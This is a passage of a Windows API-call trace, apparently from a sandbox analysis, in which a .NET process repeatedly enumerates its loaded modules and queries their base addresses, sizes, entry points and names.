lpmodinfo=0x18eb94*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.450] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.451] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.451] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.452] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.452] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18e98c, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0107.453] GetCurrentProcess () returned 0xffffffff [0107.453] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d998, cb=0x1000, lpcbNeeded=0x18ebac | out: lphModule=0x18d998, lpcbNeeded=0x18ebac) returned 1 [0107.454] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.454] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.454] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.454] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.454] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.455] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.455] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.455] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.455] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.455] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.456] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.456] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.456] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.457] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.457] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.457] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.457] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.458] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.458] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.459] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.459] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.459] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.460] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.460] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.461] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.461] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.462] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.462] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.463] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.510] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.513] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18e998, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0107.515] GetCurrentProcess () returned 0xffffffff [0107.515] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d9b4, cb=0x1000, lpcbNeeded=0x18ebc8 | out: lphModule=0x18d9b4, lpcbNeeded=0x18ebc8) returned 1 [0107.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.517] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.517] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.517] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.518] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.518] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.518] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.519] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.519] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.519] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.520] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.520] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.520] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.521] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.521] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.522] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.522] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.522] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.523] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.523] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.524] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.525] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.525] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.526] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.526] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18ebbc, cb=0xc | out: lpmodinfo=0x18ebbc*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.527] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18e9b4, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0107.530] StrStrIW (lpFirst="api-ms-win-appmodel-runtime-l1-1-0.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.533] GetCurrentProcess () returned 0xffffffff [0107.533] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d7b4, cb=0x1000, lpcbNeeded=0x18e9c8 | out: lphModule=0x18d7b4, lpcbNeeded=0x18e9c8) returned 1 [0107.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.537] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.537] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.537] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.538] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.538] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.538] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.539] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.539] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.539] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.540] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.540] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.541] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.542] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.542] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.543] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.543] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.544] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.544] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.547] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.548] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.549] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.549] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0107.550] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x756d0000, lpBaseName=0x18e7b4, nSize=0x104 | out: lpBaseName="VERSION.dll") returned 0xb [0107.646] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.648] GetCurrentProcess () returned 0xffffffff [0107.649] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d79c, cb=0x1000, lpcbNeeded=0x18e9b0 | out: lphModule=0x18d79c, lpcbNeeded=0x18e9b0) returned 1 [0107.649] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.649] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18e9a4, cb=0xc | out: 